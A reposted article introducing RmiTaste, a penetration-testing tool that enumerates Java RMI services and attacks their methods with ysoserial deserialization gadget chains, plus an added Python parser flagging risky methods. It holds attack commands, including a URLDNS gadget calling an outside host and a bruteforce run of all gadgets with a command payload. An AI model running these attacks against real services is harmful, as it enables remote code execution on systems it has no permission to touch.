
RmiTaste: A Tool for Detecting, Enumerating, Interacting with and Attacking RMI Services


RmiTaste

RmiTaste helps security researchers detect, enumerate, interact with and attack RMI services by calling remote methods with the gadget chains provided by the ysoserial utility. It also lets us call remote methods with specific parameters.

The main purpose of RmiTaste is to help security professionals identify insecure RMI services on target systems. Unauthorized access to computer systems is illegal, and RmiTaste must only be used in lawful scenarios.

Building and Running the Tool

Note that the tool requires OpenJDK v11.0.3.

First, download ysoserial-master-SNAPSHOT.jar and place it in the libs_attack directory. It can be downloaded from:

https://github.com/frohoff/ysoserial

Second, build the project with Maven:

mvn package

Next, run the following command:

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h

 __________        ._____________                __
 \______   \ _____ |__\__    ___/____    _______/  |_  ____
 |       _//     \|  | |    |  \__  \  /  ___/\   __\/ __ \
 |    |   \  Y Y  \  | |    |   / __ \_\___ \  |  | \  ___/
 |____|_  /__|_|  /__| |____|  (____  /____  > |__|  \___  >
       \/      \/                  \/     \/            \/
 @author Marcin Ogorzelski (mzero - @_mzer0) STM Solutions

Warning: RmiTaste was written to aid security professionals in identifying the
         insecure use of RMI services on systems which the user has prior
         permission to attack. RmiTaste must be used in accordance with all
         relevant laws. Failure to do so could lead to your prosecution.
         The developers assume no liability and are not responsible for any
         misuse or damage caused by this program.

Using the Tool

RmiTaste offers four modes: conn (connect), enum (enumerate), attack and call. Each mode has its own help menu:

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h
(...)
Usage: <main class> [-h] [COMMAND]
  -h, --help   Show this help message
Commands:
  conn   Check the connection to the host
  enum   Enumerate the RMI service
  attack  Attack registered RMI methods
  call    Call a specific method of an RMI remote object

conn (connect) mode

conn mode lets us check whether the target port is serving RMI:

# Check if 127.0.0.1:1099 is RMI Service
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn -t 127.0.0.1 -p 1099

enum (enumerate) mode

enum mode lets a researcher gather information about the RMI service, such as the names of the remote objects and the classes and interfaces each remote object extends or implements. If the interface implemented by a remote object is available on the RmiTaste classpath, RmiTaste also prints all of its remote methods, which can then be called directly:

# RMI service enumeration
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099

attack mode

attack mode calls remote methods with a chosen ysoserial gadget chain as the argument. Suppose the remote object has the following methods:

acc1 [object] [127.0.1.1:38293]
         implements java.rmi.Remote [interface]
         extends java.lang.reflect.Proxy [class]
         implements m0.rmitaste.example.server.ClientAccount [interface]
                setPin(java.lang.String param0); [method]
                        Parameters: param0;  may be vulnerable to Java Deserialization! [info]
                getBalance(); [method]
                deposit(java.lang.Object param0); [method]
                        Parameters: param0;  may be vulnerable to Java Deserialization! [info]
                withdraw(float param0); [method]

# Call all remote methods with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -g "URLDNS" -c "http://rce.mzero.pl"

# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -g "URLDNS" -c "http://rce.mzero.pl"

The "-gen bruteforce" option also lets us brute-force the remote method by trying every ysoserial gadget chain in turn:

# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -gen bruteforce -c "ping 127.0.0.1"

call mode

call mode lets us invoke a specific method of an RMI remote object with parameters we choose. Suppose the remote object has the following methods:

acc1 [object] [127.0.1.1:38293]
         implements java.rmi.Remote [interface]
         extends java.lang.reflect.Proxy [class]
         implements m0.rmitaste.example.server.ClientAccount [interface]
                setPin(java.lang.String param0); [method]
                        Parameters: param0;  may be vulnerable to Java Deserialization! [info]
                getBalance(); [method]
                deposit(java.lang.Object param0); [method]
                        Parameters: param0;  may be vulnerable to Java Deserialization! [info]
                withdraw(float param0); [method]

# Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance"

# Call m0.rmitaste.example.server.ClientAccount.setPin("1234") method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:setPin" -mp "string=1234"

Usage Example

Click [here] to get the sample server.

First, start the sample server.

Next, enumerate the remote objects:

root@keyisinyourmind:/media/sf_pentest2/Tools/python/Toolset/Others/RmiTasteTool# java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099
acc1 [object] [127.0.1.1:42881]
   extends java.rmi.server.RemoteObjectInvocationHandler [class]
   implements java.rmi.Remote [interface]
   extends java.lang.reflect.Proxy [class]
   extends java.rmi.server.RemoteObject [class]
   implements m0.rmitaste.example.server.ClientAccount [interface]
   No methods found. I don't have remote object interface. Give it to me!

acc2 [object] [127.0.1.1:42881]
   extends java.rmi.server.RemoteObjectInvocationHandler [class]
   implements java.rmi.Remote [interface]
   extends java.lang.reflect.Proxy [class]
   extends java.rmi.server.RemoteObject [class]
   implements m0.rmitaste.example.server.ClientAccount [interface]
   No methods found. I don't have remote object interface. Give it to me!

As you can see, RmiTaste needs the remote object's interface class in order to list its methods. In a real penetration test, we would have to locate these interfaces ourselves. In this example, it is enough to copy rmitaste.examples-1.0-SNAPSHOT-all.jar into the libs_attack directory. The enumerated objects then look like this:

acc1 [object] [127.0.1.1:42881]
   extends java.rmi.server.RemoteObjectInvocationHandler [class]
   implements java.rmi.Remote [interface]
   extends java.lang.reflect.Proxy [class]
   extends java.rmi.server.RemoteObject [class]
   implements m0.rmitaste.example.server.ClientAccount [interface]
   setPin(java.lang.String param0); [method]
   Parameters: param0;  may be vulnerable to Java Deserialization! [info]
   getBalance(); [method]
   deposit(java.lang.Object param0); [method]
   Parameters: param0;  may be vulnerable to Java Deserialization! [info]
   withdraw(float param0); [method]

acc2 [object] [127.0.1.1:42881]
   extends java.rmi.server.RemoteObjectInvocationHandler [class]
   implements java.rmi.Remote [interface]
   extends java.lang.reflect.Proxy [class]
   extends java.rmi.server.RemoteObject [class]
   implements m0.rmitaste.example.server.ClientAccount [interface]
   setPin(java.lang.String param0); [method]
   Parameters: param0;  may be vulnerable to Java Deserialization! [info]
   getBalance(); [method]
   deposit(java.lang.Object param0); [method]
   Parameters: param0;  may be vulnerable to Java Deserialization! [info]
   withdraw(float param0); [method]
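The enum listing above (and the one in the enum mode section) flags setPin(String) and deposit(Object) but not withdraw(float) or getBalance(). The reason, as I understand RMI, is that the server unmarshals every non-primitive argument with readObject() before any cast, so the client decides which serialized class arrives, while primitives are read as plain values. The following Python is an added example, not code from the article or the RmiTaste project: it parses the enum output into an inventory and reproduces that flag so a defender can list which exported methods need a serialization filter or an interface change. The sample listing is constructed in the layout shown above.

```python
import re

# Constructed sample in the layout of the RmiTaste enum output shown above.
SAMPLE_ENUM_OUTPUT = """\
acc1 [object] [127.0.1.1:42881]
   implements java.rmi.Remote [interface]
   implements m0.rmitaste.example.server.ClientAccount [interface]
   setPin(java.lang.String param0); [method]
   Parameters: param0;  may be vulnerable to Java Deserialization! [info]
   getBalance(); [method]
   deposit(java.lang.Object param0); [method]
   withdraw(float param0); [method]

acc2 [object] [127.0.1.1:42881]
   implements java.rmi.Remote [interface]
   No methods found. I don't have remote object interface. Give it to me!
"""

JAVA_PRIMITIVES = {"boolean", "byte", "char", "short", "int", "long", "float", "double"}
OBJECT_RE = re.compile(r"^(\S+) \[object\] \[([^\]]+)\]$")
IFACE_RE = re.compile(r"^\s*implements (\S+) \[interface\]$")
METHOD_RE = re.compile(r"^\s*(\w+)\((.*)\); \[method\]$")


def accepts_object(param_types):
    # Non-primitive arguments (String included) are read with readObject() on the
    # server, so the caller controls the serialized type; primitives are plain values.
    return any(t not in JAVA_PRIMITIVES for t in param_types)


def parse_enum_output(text):
    """Return [{name, endpoint, interface_known, methods: [(iface, name, [types])]}]."""
    objects, cur, iface = [], None, None
    for line in text.splitlines():
        if m := OBJECT_RE.match(line):
            cur = {"name": m.group(1), "endpoint": m.group(2), "interface_known": True, "methods": []}
            objects.append(cur)
            iface = None
        elif cur is None:
            continue
        elif (m := IFACE_RE.match(line)) and m.group(1) != "java.rmi.Remote":
            iface = m.group(1)  # the methods listed next belong to this interface
        elif m := METHOD_RE.match(line):
            types = [p.split()[0] for p in m.group(2).split(",") if p.strip()]
            cur["methods"].append((iface, m.group(1), types))
        elif "No methods found" in line:
            cur["interface_known"] = False
    return objects


def deserialization_sinks(objects):
    """'object:interface:method' ids (RmiTaste's -m format) whose arguments are client-typed."""
    return [f"{o['name']}:{iface}:{name}" for o in objects
            for iface, name, types in o["methods"] if accepts_object(types)]
```

The ids returned by deserialization_sinks are the methods to cover with a process-wide ObjectInputFilter (JEP 290) or to redesign so that they take only primitives or well-known types.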

Project Repository

RmiTaste: [GitHub]

Original article by Admin. Please credit the source when reposting: https://secvery.com/4820.html